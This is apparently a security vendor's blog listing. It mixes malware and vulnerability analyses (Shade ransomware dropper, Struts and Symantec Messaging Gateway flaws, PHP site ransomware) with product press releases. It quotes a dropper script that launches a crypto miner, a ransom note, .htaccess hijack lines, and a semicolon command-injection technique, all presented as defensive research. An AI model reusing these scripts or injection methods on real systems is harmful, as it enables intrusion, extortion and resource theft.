Cashandler.A: New variant family of InfoStealer Trojan actively spreading in the wild.

/in /by

The SonicWall Capture Labs Threat Research team has received reports of a new variant family of InfoStealer Trojan [GAV: Cashandler.A] actively spreading in the wild.

Cashandler malware gathers confidential information from the computer such as login details, passwords; financial information sends it to its own C&C Server.

Infection Cycle:

The Malware adds the following files to the system:

The Trojan adds the following keys to the Windows registry startup:

Once the computer is compromised, the malware copies its own executable file to Temp folder and runs following commands:

The malware’s goal is to collect as much data as possible; attacker’s profit based on the level of user information that is collected. Thereby more information collected leads to higher profits.

The malware also performs key logging and steals clipboard data from target and saves in following registry key:

During our research we have noticed that hackers used a free yahoo email address account for their malware,we were able to retrieve their credentials as they were hard coded into the malware. Once the credentials were decrypted, we were able to access the hacker email account.

Command and Control (C&C) Traffic

Cashandler performs C&C communication over HTTP protocol.

The malware sends the victim’s Computer information to its own C&C server via following format, here is an example:

SonicWall Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Cashandler.A (Trojan)

Apache Struts 2 CVE-2017-9805 Remote Code Execution

/in /by

A critical vulnerability CVE-2017-9805 (S2-052) on Apache Struts 2 has been reported by security researchers form lgtm.com. This vulnerability is caused by the XStreamHandler in by the REST Plugin. During the process of deserializing the XML formatted packet, XStream failed to filter the file types. An attacker can send a certain crafted XML file to the target server and execute arbitrary code with the privelege of the current service.

The PoC of this vulnerability is already in the wild. By sending the following payload as application/xml, the calc.exe will be executed on the target host.

0 …[truncated]…/Applications/Calculator.app/Contents/MacOS/Calculator…[truncated]…

In this PoC, the “map” class contributed the dangerous methods.

From the patch code on Github (http://bit.ly/2eRD33v), white lists have been applied to the xml data, this is to prevent malicious class and methods been brought in during the processing.

And the filter was added before calling the XStream.fromXML method.

SonicWALL customers are protected against this threat via the following signature:

  • IPS 12968 Apache Struts 2 Insecure Deserialization

SonicWall CEO Bill Conner Wins Inaugural SC Media 2017 Reboot Leadership Award

/0 Comments/in /by

Bill Conner has dedicated his entire career to technology and cybersecurity. It’s a mission that is rightfully acknowledged — not only via customer confidence, partner growth and upward revenue, but also industry accolades.

A new addition to SonicWall’s achievements the past year, Conner is the newest recipient of the inaugural SC Media Reboot Leadership Award. He is one of only six other elite executives honored in the publication’s top management category.

“Cybersecurity is more than technology. It’s an organic and ongoing collaboration that requires tools, skill and awareness at all levels,” said Conner. “This award is a byproduct of the dedication, support and trust in our global teams, partners, distributors and end customers. This is just the beginning of SonicWall’s renewed, aggressive and focused approach to keep customers and business safe from both known and unknown cyber threats.”

The SC Media Reboot Leadership Awards 2017 are an extension of SC Media’s Reboot edition. They are the first in what will be an ongoing awards program that enables SC Media to honor executives and professional leaders for their unique, inventive and inspiring contributions that improve security, shape the industry, provide thought leadership and otherwise have a positive impact on cybersecurity.

Logo for SC Media Reboot Leadership Award for Bill Conner

The SC Media Reboot Leadership honorees were selected based on how they changed the practice or understanding of cybersecurity for the better. The awards were organized in nine different categories, including influencers, thought leaders, top management, threat seekers, chief information officers, chief privacy officers, outstanding freshmen, outstanding educator and rising stars.

Joining SonicWall in November 2016, Conner has helped galvanize the company via new products and services, commitment to partner channels and increased global awareness.

In June, SonicWall announced the company surpassed 3 million firewalls sold and achieved 50 percent growth in partner deal registrations, reflecting more than $250 million in new pipeline. SonicWall collected 19 industry awards for its strategy, portfolio and leadership since becoming an independent company in November 2016 and Conner was announced CEO.

“Bill has been a tireless advocate for addressing cybersecurity threats through countless engagements with Capitol Hill, the media, and in the private sector when counseling the nation’s business leaders,” Michael Chertoff, Chairman of the Chertoff Group and the former U.S. Secretary of Homeland Security told SC Magazine.

In early August, CRN recognized SonicWall’s momentum and named Conner one of the top-25 most influential executives of 2017.

“The top executive has had partners cheering, as the now stand-alone network security vendor launched its new partner-focused strategy and key new technologies — like Capture Advanced Threat Protection — to bring enterprise-grade security solutions to SMB partners and customers,” CRN noted in the award profile.

View Awards

Symantec Messaging Gateway Remote Command Execution Vulnerability

/in /by

Symantec Messaging Gateway, formerly known as Brightmail, is a linux-based anti-spam/security product for e-mail servers. It is deployed as a physical device or with ESX in close proximity to the servers it is designed to protect.

A remote command vulnerability has been reported in the Symantec Messaging Gateway. This vulnerability is caused by lacking of proper check on the user inputs in the performRestore method, plus a Web authentication bypass bug in the notificationLogin() method in the LoginAction.notificationLogin. A remote attacker can exploit this vulnerability by sending certain crafted HTTP requests to the target server. A successful attack could execute arbitrary commands as the administrative user.

The authentication bypass vulnerability:

This vulnerability is due to the insufficient privilege check when calling the notificationLogin method in the LoginAction.class.

The public methods in LoginAction class can be reached via unauthenticated web requests. For example, a GET request to `/brightmail/action1.do?method=method_name` will trigger LoginAction.method_name.

When the method `LoginAction.notificationLogin` is called from such a request, the following logic will be executed:

  1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`
  2. Creates a new `UserTO` object using the decrypted `notify` parameter as an email value
  3. Creates a new session, invalidating the old one if necessary
  4. Sets the `user` attribute of the newly created session to ourconstructed UserTO object

In step 4, a new sesion with “user” atribute will be set. And such a session will be considered authenticated by the application, causing an authentication bypass vulnerability.

The remote command execution vulnerability:

The previous vulnerability allows us to call a method that requires an authenticated session. The RestoreAction.performRestore method is one of them. It takes 2 parameters: restoreSource and localBackupFilename.

In this method, the localBackupFilename parameter will be eventually passed to a command call in the “bmagent” service listening on port 41002:

/opt/Symantec/Brightmail/cli/sbin/db-restore -F

By sending a filename with “;” in it, the part after the semicolon will be executed as a shell command.

To successfully exploit this vulnerability, a CSRF token will be needed. The vulnerability reporter found the /brightmail/common.jsp file will set this token that valid for all the requests.

SonicWall Threat Research Team has the following signature to protect their customers from this type of attack:

  • IPS 12960: Symantec Messaging Gateway Remote Code Execution

Dropper trojan delivers Shade ransomware and ZCash crypto miner (Sep 1st, 2017)

/in /by

The SonicWall Capture Labs Threat Research Team have observed a dropper Trojan that drops ransomware as well as crypto miner software. In this case, a variant of the Shade ransomware is dropped and a crypto coin miner that mines ZCash (ZEC).

Infection Cycle:

The Trojan makes the following DNS queries:

  • global-genom.com
  • webroshd.com
  • whatismyipaddress.com
  • whatsmyip.net
  • eu1-zcash.flypool.org

The Trojan drops the following files on to the filesystem:

  • %ALLUSERSPROFILE%Application DataSoftwareDistribution nheqminer32.exe
  • %ALLUSERSPROFILE%Application DataSysWOW64D8pedj.cmd
  • %ALLUSERSPROFILE%Application DataWindowscsrss.exe [Detected as GAV: Shade.RSM_5 (Trojan)]
  • %ALLUSERSPROFILE%DesktopREADME{1 to 10}.txt
  • %APPDATA%CF4ED5F2CF4ED5F2.bmp
  • %TEMP%FA375141.rtf

The Trojan adds the following keys to the registry:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun Command Line Support “cmd.exe /C C:DOCUME~1ALLUSE~1APPLIC~1SysWOW64D8pedj.cmd”
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun Client Server Runtime Subsystem “”C:Documents and SettingsAll UsersApplication DataWindowscsrss.exe””

D8pedj.cmd contains the following script which starts:

      echo CreateObject("Wscript.Shell").Run ""
      ^& WScript.Arguments(0) ^& "", 0, False > "%TEMP%/QYHz1.vbs"
      && start /WAIT wscript.exe "%TEMP%/QYHz1.vbs" "C:DOCUME~1ALLUSE~1APPLIC~1
      SOFTWA~1NHEQMI~1.EXE -l eu1-zcash.flypool.org:3333 -u
      t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.FA0F586A -t 1" && del "%TEMP%QYHz1.vbs"

README{1 to 10}.txt contains the following text:

      All the important files on your computer were encrypted.
      To decrypt the files you should send the following code:
      0E7F1123D9BE734AF274|0
      to e-mail address gervasiy.menyaev@gmail.com.
      Then you will receive all necessary instructions.
      All the attempts of decryption by yourself will result only in irrevocable loss of your data.
      If you still want to try to decrypt them by yourself please make a backup at first because
      the decryption will become impossible in case of any changes inside the files.
      If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
      use the feedback form. You can do it by two ways:
      1) Download Tor Browser from here:
      https://www.torproject.org/download/download-easy.html.en
      Install it and type the following address into the address bar:
      http://cryptsen7fo43rr6.onion/
      Press Enter and then the page with feedback form will be loaded.
      2) Go to the one of the following addresses in any browser:
      http://cryptsen7fo43rr6.onion.to/
      http://cryptsen7fo43rr6.onion.cab/

The Trojan contacts whatsmyip.net to obtain the machines external IP address:

The Trojan downloads the Shade ransomware binary, document_082017_6401df.exe [Detected as GAV: Shade.RSM_5 (Trojan)]:

Once executed, it displays CF4ED5F2CF4ED5F2.bmp on the desktop background:

It also displays the following russian text file: FA375141.rtf

The Trojan encrypts files on the system and renames them to {encrypted filename}.crypted000007.

In addition to ransomware, a crypto miner is also dropped onto the system. Rather than mining Bitcoin, it mines ZCash (ZEC) which is worth $283/ZEC USD at the time of writing. nheqminer32.exe can be seen running in the process list:

The address accumulating the rewards is t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep. Mining activity can be observed by visiting the zcash.flypool.org website:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

      GAV: Dropper.RSM_6 (Trojan)
      GAV: Shade.RSM_5 (Trojan)

SonicWall Expands Scalability of its Next-Generation Firewall Platforms and DPI SSL to Address Encrypted Threats

/0 Comments/in /by

Day after day, the number of users is growing on the web, and so is the number of connections. At the same time, so is the number of cyberattacks hidden by encryption. SonicWall continues to tackle the encrypted threat problem by expanding the number of SSL/TLS connections that it can inspect for ransomware.

Today, a typical web browser keeps 3-5 connections open per tab, even if the window is not the active browser tab. The number of connections can easily increase to 15 or 20 if the tab runs an online app like Microsoft SharePoint, Office web apps, or Google Docs. In addition, actions such as loading or refreshing the browser page may temporarily spike another 10-50 connections to retrieve various parts of the page. A good example this scenario is an advertisement heavy webpage that can really add connections if the user has not installed an ad blocker plugin. Also keep in mind that many ad banners in web pages embed a code to auto-refresh every few seconds, even if the current tab is inactive or minimized. That said, it makes a lot of difference how many browser tabs your users typically keep open continuously during the day and how refresh-intensive those pages are.

We can make some assumptions on the average number of connections for different types of users.  For example, light web users may use an average of 30-50 connections, with peak connection count of 120-250.  On the other hand, heavy consumers may use twice that, for up to 500 simultaneous connections.

If a client is using BitTorrent on a regular basis that alone will allocate at least 500 connections for that user (with the possibility to consume 2,000+ connections). For a mainstream organization it is safe to assume that on average 80% of the users are considered as light consumers, whereas the remaining 20 percent are heavy consumers. The above numbers will provide a ballpark of a few hundred thousand connections for a company of 1,000 employees – 3 to 5 times higher than the number of connections for the same organization a decade ago.

With all the changes in browser content delivery and presentation, as well as users’ advanced manipulation of the web and its content, it’s necessary for SonicWall to address the forever increasing demand in the number of connections to satisfy the customer need and provide them with a better user experience. In the recently released SonicOS 6.2.9 for SonicWall next-gen firewalls, our engineering team has increased the number of stateful packet inspection (SPI) and deep packet inspection (DPI) connections to better serve this need.

Below is the new connection count  for Stateful Packet Inspection connections for SonicWall Gen6 Network Security Appliance  (NSA) and SuperMassive Series firewalls in the new SonicOS 6.2.9 when compared to the same count in the previous 6.2.7.1:

SPI Connection Chart

In addition, the number of DPI connections has increased up to 150 percent on some platforms. Below is a comparison of the new connection count in SonicOS 6.2.9 against SonicOS 6.2.7.1.
DPI Connection Chart

Finally, for security-savvy network administrators we have provided a lever to increase the maximum number of DPI-SSL connections by foregoing a number of DPI connections. Below is a comparison of the default and maximum number of DPI-SSL connection by taking advantage of this lever.

Increase Max DPI SSL Connections Chart

We also enhanced our award winning Capture ATP, a cloud sandbox service by improving the user experience of the“Block Until Verdict” feature, which prevents suspicious files from entering the network until the sandboxing technology finishes evaluation.

In addition, SonicOS 6.2.9 enables Active/Active clustering (on NSA 3600 and NSA 4600 firewalls), as well as enhanced HTTP/HTTPS redirection.

Whether your organization is a startup of 50 users or an enterprise of few thousand employees, SonicWall is always considering its customers’ needs and strives to better serve you by constantly improving our feature set and offerings.

For all of the feature updates in SonicOS 6.2.9, please see the latest SonicOS 6.2.9 data sheet (s). Upgrade today.

View DPI SSL eBook

Hackers Attack Websites with Ransomware – August 2017

/in /by

SonicWALL Threat Research Labs recently received reports of attackers targeting websites with ransomware. Attackers are uploading malicious PHP files onto the websites. These PHP files allow the attacker to encrypt the website’s files and then extort money from the site’s owner.

Once uploaded, the attacker then connects to the ransomware via a web browser, as follows:

The attacker can then submit a complex encryption key to encrypt the site’s content. This results to:

The malware overwrites the .htaccess file with the following contents:

#Bug7sec Team
DirectoryIndex shor7cut.php
ErrorDocument 404 /shor7cut.php

This redirects the website to the file shor7cut.php.

In addition, the ransomware traverses the directory searching for files to encrypt. The file contents are then encrypted using PHP’s mcrypt function. And then it is renamed with the .shor7cut extension name.

Once the malware is done encrypting, it sends an email to the attacker containing the encryption key used:

Once the site owner pays the ransom, the attacker then goes back to the ransomware PHP and choose the “DeInfection” option:

Entering the appropriate key, the ransomware then restores the files:

SonicWALL Threat Research Team has the following signature to protect their customers from this type of attack:

  • GAV 17970: Ronggolawe.RSM
  • WAF 1669: Ronggolawe.RSM

SyncCrypt Ransomware hides behind an image file

/in /by

This week, the SonicWall Capture Labs Threat Research team has received reports of yet another ransomware being distributed via spam. The email purports to be a message with a sense of urgency and importance that comes with a document attached but in fact contains a Windows Script file (.wsf) within a zip archive. Once executed it will download a seemingly non-malicious image file and then installs a ransomware called SyncCrypt.

Infection Cycle:

Upon execution, it downloads a jpg file as seen in the snippet of the javascript code below:

Trying to download the jpg file from the sources above will get you this non-malicious looking file:

But upon careful examination, this jpg file appears to be an archive containing the ransomware components.

These files are then unpacked and saved in the following location:

  • %temp%/BackupClient/sync.exe [Detected as GAV: SyncCrypt.RSM (Trojan) ]
  • %temp%/BackupClient/readme.html
  • %temp%/BackupClient/readme.png

It then tries to confuse the victim by displaying this error message after the script runs.

Meanwhile the ransomware encrypts the victim’s file like usual and appends .KK to all encrypted files. The ransomware note with details on payment instructions is then displayed as shown in the figure below:

Because of the prevalence of these types of malware attacks, we urge our users to back up their files regularly.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: SyncCrypt.RSM (Trojan)

  • GAV: WScript.SyncCrypt.RSM (Trojan)

SonicWall and Dell EMC: A Strategic Partnership Providing Network Security Solutions to Stay Ahead of the Cyber Arms Race

/0 Comments/in /by

I am pleased to announce that, Dell EMC is now shipping the OEM version of the SonicWall next-generation cyber security firewall solutions in the United States and Canada.  Continuing on our long time partnership and resale relationship, Dell EMC will offer the powerful combination of SonicWall’s innovative threat protection technology and Dell EMC’s broad set of solutions from the data center all the way to endpoint devices.

Organizations today are looking to transform their business to drive IT innovation, enhance workforce mobility and reduce risk. However, digital transformation can increase exposure to risks that can directly impact an organization’s data, reputation, and credibility.

Addressing customer’s security needs as they move to the cloud, extend their network and storage solutions, and migrate to more mobile and IoT environments is critical with today’s threat landscape.  The combination of Dell EMC solutions and SonicWall is a great value add to Dell EMC customers and the partner community.

Here are some key points on the OEM:

SonicWall next-generation firewalls provide effective threat prevention through a layered approach on top of our multi-engine cloud-based SonicWall Capture Advanced Threat Protection Service. This solution protects organizations from today’s most insidious threats including ransomware, encrypted malware, mobile threats and email-borne attacks.

The SonicWall OEM security solution is a critical affirmation of how important the Dell EMC – SonicWall partnership is for their large customer base and their Dell EMC Partner Program members.

For additional information, please see the following press release – https://www.sonicwall.com/en-us/about-sonicwall/news/press-releases/pr-articles/sonicwall-and-dell-emc-announce-oem-launch-of-next

VIEW PRESS RELEASE

Connecting and Protecting the Remote Islands of Corporate IT – BYOD and Mobility

/0 Comments/in /by

How Dell and SonicWall’s SMA and Next-Generation Firewall solution builds secure virtual bridges for today’s fragmented environments

As employees are no longer restricted to the physical structures of their company headquarters, what and how they connect to their corporate network presents a multitude of challenges. Corporate IT environments consist of a seemingly uncontrollable combination of devices, operating systems, and geographic locations. Securely connecting all of these is one of the most crucial IT initiatives companies are faced with as Gartner reports that 70% of mobile professionals will conduct their work on personal smart devices by 2018.

As we are all well aware, all endpoints pose significant threats to network security. Specifically, BYOD consumer devices are usually the most difficult to manage and secure. Data loss or leakage and unauthorized access or transmission are a constant concern. Mobile devices can also retain sensitive or proprietary data while wirelessly connected to the corporate network. White-listing apps for distribution on IOS and Android platforms help lock down mobile devices, but unmanaged laptops require greater endpoint control via the VPN.

What can you do to protect it all?

Dell and SonicWall’s VPN and Next-Generation Firewall solution delivers a layered defense strategy to ensure employees have the access they need while providing the security the company requires.

Components of a VPN and Next-Generation Firewall Solution:

  • Secure Mobile Access (SMA) Appliances – Provide mobility and secure access for up to 20,000 concurrent users from a single, powerful, and granular access control engine.
  • Next-Generation Firewalls – Network security, control, and visibility through sandboxing, SSL inspection, intrusion prevention, anti-malware, application identification, and content filtering.
  • Remote Access Management & Reporting – Powerful, web-based remote IT management platform to streamline appliance management and provide extensive reporting.
  • VPN Clients/Mobile Connect – Simple, policy-enforced secure access to mission-critical applications and data for iOS, OS X, Android, Chrome OS, Kindle Fire, and Windows mobile devices.

Deploying a SonicWall VPN and Next-Generation Firewall solution provides multi-layered protection that can authorize, decrypt, and remove threats from SSL VPN traffic before it enters the network environment. The dual protection of a SonicWall SMA and Next-Generation Firewall is critical to ensuring the security of both VPN access and traffic. SonicWall’s remote access management and reporting also allows organizations to view, define, and enforce how application and bandwidth assets are used.

Securely connecting your workforce, partners, and customers has never been more important. Reach out today to your Dell and SonicWall contacts today to learn what implementing a SonicWall VPN and Next-Generation Firewall solution can mean for the future of your company.

Read Solution Brief